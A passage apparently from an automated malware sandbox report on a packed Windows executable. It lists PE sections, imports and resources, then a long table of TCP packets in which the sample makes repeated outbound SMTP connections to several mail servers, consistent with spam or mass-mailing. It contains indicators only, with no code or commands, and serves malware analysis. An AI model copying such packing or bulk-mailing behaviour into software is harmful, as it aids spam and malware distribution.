IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ca000	0x4400	False	0.9847771139705882	data	7.84639890253536	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1cb000	0x10518	0xe00	False	0.6654575892857143	data	5.94827609272861	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.mjg	0x1dc000	0x1	0x1	False	9.0	very short file (no magic)	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1cb0d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	German	Germany
RT_ICON	0x1cb200	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	German	Germany
RT_GROUP_ICON	0x1cb4e8	0x22	data	German	Germany

Imports

DLL	Import
kernel32.dll	LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 20, 2023 09:50:20.897433996 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.897507906 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.897629023 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.897861004 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.897876024 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.946335077 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.946583986 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.947705030 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.947734118 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.948872089 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.948896885 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.949031115 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.949055910 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.949181080 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.949208975 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.949340105 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.949376106 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:20.949445009 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:20.949462891 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:21.057640076 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:21.057746887 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:21.057796955 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:21.057852983 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:21.058007002 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:21.058036089 CET	443	49701	23.0.174.123	192.168.2.5
Feb 20, 2023 09:50:21.058052063 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:21.058090925 CET	49701	443	192.168.2.5	23.0.174.123
Feb 20, 2023 09:50:33.783236980 CET	49702	25	192.168.2.5	98.136.96.91
Feb 20, 2023 09:50:33.917958021 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:33.918093920 CET	49702	25	192.168.2.5	98.136.96.91
Feb 20, 2023 09:50:34.380933046 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:34.385436058 CET	49702	25	192.168.2.5	98.136.96.91
Feb 20, 2023 09:50:34.519850016 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:34.519920111 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:34.525001049 CET	49702	25	192.168.2.5	98.136.96.91
Feb 20, 2023 09:50:34.661086082 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:34.661134958 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:34.661288023 CET	49702	25	192.168.2.5	98.136.96.91
Feb 20, 2023 09:50:34.670129061 CET	49702	25	192.168.2.5	98.136.96.91
Feb 20, 2023 09:50:34.804594994 CET	25	49702	98.136.96.91	192.168.2.5
Feb 20, 2023 09:50:35.240556955 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:35.402213097 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:35.402324915 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:35.459191084 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:35.607467890 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:35.628993988 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:35.629162073 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:35.641434908 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:35.798612118 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:35.803085089 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:35.814343929 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:35.818295956 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:35.980067015 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:35.980484009 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:35.983009100 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:35.988339901 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:36.157299995 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:36.159878969 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:36.182512999 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:36.252170086 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.279114962 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.279242992 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.305505037 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:36.306385994 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.322045088 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.324975967 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.329412937 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:36.338124037 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:36.352451086 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.358318090 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.375935078 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.406579018 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.408811092 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.441749096 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.450522900 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.467915058 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:36.467972040 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:36.472481012 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.474059105 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.500546932 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.503456116 CET	25	49705	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.503609896 CET	49705	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.506203890 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:36.507070065 CET	25	49704	104.47.66.10	192.168.2.5
Feb 20, 2023 09:50:36.507144928 CET	49704	25	192.168.2.5	104.47.66.10
Feb 20, 2023 09:50:36.629314899 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.662235022 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:36.663188934 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.824825048 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:36.826364040 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.861766100 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.888508081 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.888689995 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.920476913 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.943886042 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:36.950942039 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:36.970809937 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.975263119 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:36.986596107 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.011146069 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.017268896 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.020998001 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.045491934 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.046412945 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.053863049 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.105477095 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:37.112799883 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.113948107 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.168406963 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.172370911 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.172734022 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.174124956 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.200481892 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.203160048 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.206758976 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.209441900 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.209939957 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.210994005 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:37.211085081 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:37.238806963 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.239101887 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.265970945 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.266566992 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.276263952 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.276761055 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.293486118 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.294043064 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.321947098 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.322530031 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.335685968 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.336477041 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.349704027 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.366764069 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.372248888 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.372492075 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.393662930 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.393913984 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.420770884 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.438314915 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.438735962 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.498096943 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.534013987 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.580282927 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.600476980 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.600860119 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.607269049 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.607497931 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.634660959 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.651738882 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.678775072 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.678926945 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:37.705892086 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:37.762413025 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:37.762923002 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:37.924376011 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:38.047158957 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:38.208805084 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:38.209433079 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:38.217293024 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.244255066 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.244558096 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.272243977 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.272980928 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.299993038 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.346702099 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.371026993 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:38.372416973 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:38.373744011 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.374022007 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.400885105 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.417517900 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.444483042 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.444983959 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.471947908 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.472518921 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:38.499859095 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:38.534075022 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:38.535135031 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:38.696873903 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:39.241497040 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.241497040 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:39.268517017 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.268753052 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.295681953 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.319149017 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.346169949 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.346730947 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.373661041 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.374018908 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.400871992 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.403136969 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:39.403506041 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:39.426724911 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.453752041 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.453938961 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.480784893 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.481139898 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.507996082 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.534346104 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.561275959 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.561541080 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.564970970 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:39.565589905 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:39.588417053 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.629930019 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.656842947 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.657227993 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.684083939 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.686722994 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.713534117 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.727016926 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:39.727801085 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:39.757420063 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.784264088 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.784420967 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.811923027 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.855267048 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:39.870124102 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.890180111 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:39.890680075 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:39.897963047 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.898741007 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.926551104 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.964639902 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:39.965100050 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:39.991504908 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:39.993263006 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:40.021457911 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:40.053432941 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:40.053915024 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:40.073410988 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:40.215544939 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:40.292839050 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:41.388391018 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:41.388473988 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.395706892 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:41.415410042 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.415726900 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.442791939 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.500264883 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:41.513936043 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.514558077 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:41.541060925 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.541316032 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.550052881 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:41.550466061 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:41.568252087 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.664123058 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:41.712070942 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.712176085 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:41.712564945 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:41.739622116 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.739792109 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.767857075 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.845381975 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.872390032 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.872553110 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.874314070 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:41.874486923 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:41.899513960 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.899655104 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.927443981 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.927640915 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:41.954778910 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:41.985059977 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.012216091 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.012418985 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.036058903 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:42.036525011 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:42.039267063 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.039688110 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.066633940 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.088606119 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.115663052 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.115962982 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.116511106 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:42.143030882 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.143520117 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.170502901 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.170981884 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.197907925 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.198172092 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.198903084 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:42.199954033 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:42.221024990 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:42.221184969 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:42.226145983 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.226370096 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.253248930 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.253613949 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.280478954 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.280860901 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.307773113 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.307991028 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.336313009 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.336590052 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.362421989 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:42.363929987 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:42.364168882 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.364464045 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.391324043 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.391669035 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.418551922 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.418898106 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.428941011 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.445920944 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.446278095 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.455420017 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.455580950 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.473309994 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.473989964 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.486725092 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.491756916 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.500897884 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.501599073 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.518460035 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.524015903 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.525635958 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:42.526797056 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:42.528480053 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.528824091 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.539316893 CET	49709	25	192.168.2.5	142.250.102.26
